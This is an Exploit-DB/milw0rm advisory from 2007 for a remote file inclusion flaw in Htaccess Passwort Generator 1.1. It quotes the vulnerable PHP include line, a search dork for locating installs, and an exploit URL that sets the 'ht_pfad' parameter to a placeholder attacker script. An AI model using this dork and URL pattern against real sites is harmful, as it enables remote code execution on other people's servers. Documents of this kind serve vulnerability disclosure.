Htaccess Passwort Generator 1.1 - 'ht_pfad' Remote File Inclusion

EDB-ID:

3324




Platform:

PHP

Date:

2007-02-16


********Htaccess_gen_V[1].1.1_(C)**********
Htaccess Passwort Generator V.1.1
Discovered By:- kezzap66345
Download:http://www.virtualsystem.de/downloads/index.php?mekat=PHP_Scripte&seite=2
dork:ht_gen.php

code:

include ($ht_pfad."/tpl/ok.html");

exploit
http://target/[path]/generate.php?ht_pfad=3vil script?
I am a Turk..

# milw0rm.com [2007-02-16]